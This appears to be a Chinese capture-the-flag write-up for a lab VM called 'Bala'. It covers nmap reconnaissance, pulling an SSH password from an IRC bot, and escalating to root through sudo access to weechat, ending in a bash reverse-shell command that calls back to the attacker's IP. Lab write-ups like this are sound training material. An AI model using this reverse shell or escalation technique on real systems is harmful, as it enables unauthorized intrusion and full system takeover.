![Bala[MazeSec]](https://gitlab.com/aristorechina/blog_imgur/-/raw/main/2025/ctf_writeup_cover_2dcbf3013efda15f.gif)
信息收集
cmd
┌──(root㉿kali)-[~]└─# arp-scan -l | grep PCS192.168.12.142 08:00:27:64:30:cb PCS Systemtechnik GmbH ┌──(root㉿kali)-[~]└─# IP=192.168.12.142 cmd
┌──(root㉿kali)-[~]└─# nmap -sV -sC -A $IP -PnStarting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 21:10 CSTNmap scan report for 192.168.12.142Host is up (0.00059s latency).Not shown: 997 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)| ssh-hostkey: | 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)80/tcp open http Apache httpd 2.4.62 ((Debian))|_http-server-header: Apache/2.4.62 (Debian)|_http-title: IRC\xE9\x80\x9A\xE4\xBF\xA1\xE5\x8D\x8F\xE8\xAE\xAE - \xE6\x9A\x97\xE9\xBB\x91\xE4\xB8\xBB\xE9\xA2\x986667/tcp open irc| irc-info: | users: 2| servers: 1| chans: 4| lusers: 2| lservers: 0| server: irc.local| version: InspIRCd-3. irc.local | source ident: nmap| source host: 192.168.12.55|_ error: Closing link: (nmap@192.168.12.55) [Client exited]MAC Address: 08:00:27:64:30:CB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Device type: general purpose|routerRunning: Linux 4.X|5.X, MikroTik RouterOS 7.XOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)Network Distance: 1 hopService Info: Host: irc.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTEHOP RTT ADDRESS1 0.58 ms 192.168.12.142 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 17.02 seconds6667 端口开了个 InspIRCd 服务,用 HexChat 连接:
像这样设置好之后 Connect 就行
在弹出的窗口中勾选 Open the channel list. 看看有哪些频道
然后逐个加入看看
刚登进来拿到这些信息:
然后在左边四个频道逐个查看,发现每个频道的管理员都是 bala,和 bala 私聊:
text
<root> 111<bala> 未知命令,可用命令: getpassword, help, info<root> getpassword<bala> 密码: ai01ClGAXoYpeevwNMS1<bala> 此密码为敏感信息,请妥善保管<root> help<bala> 可用命令:<bala> getpassword - 获取密码<bala> help - 显示帮助<bala> info - 机器人信息* DCC CHAT '' to bala timed out, aborting.<root> info<bala> Simple IRC Bot v2.0<bala> 功能: 密码管理、频道通信密码猜测是 SSH 的密钥,刚登进来时拿到的 fzer 很可疑,猜测是用户名,尝试登录:
cmd
┌──(root㉿kali)-[~]└─# ssh fzer@$IPThe authenticity of host '192.168.12.142 (192.168.12.142)' can't be established.ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.This host key is known by the following other names/addresses: ~/.ssh/known_hosts:2: [hashed name] ~/.ssh/known_hosts:4: [hashed name] ~/.ssh/known_hosts:5: [hashed name] ~/.ssh/known_hosts:12: [hashed name] ~/.ssh/known_hosts:13: [hashed name]Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '192.168.12.142' (ED25519) to the list of known hosts.fzer@192.168.12.142's password: Linux Bala 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 The programs included with the Debian GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.Last login: Fri Nov 7 11:31:34 2025 from 192.168.12.55fzer@Bala:~$ iduid=1000(fzer) gid=1000(fzer) groups=1000(fzer)提权
列出当前用户允许通过 sudo 执行的命令
cmd
fzer@Bala:~$ sudo -l[sudo] password for fzer: Matching Defaults entries for fzer on Bala: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User fzer may run the following commands on Bala: (ALL) PASSWD: /usr/bin/weechatweechat 是一个命令行界面的 IRC 客户端,用 sudo /usr/bin/weechat 进入
运行 /exec -o /bin/bash 没回显,试试看反弹 shell
text
/exec bash -c 'bash -i >& /dev/tcp/192.168.12.55/4444 0>&1'成功拿到 root shell
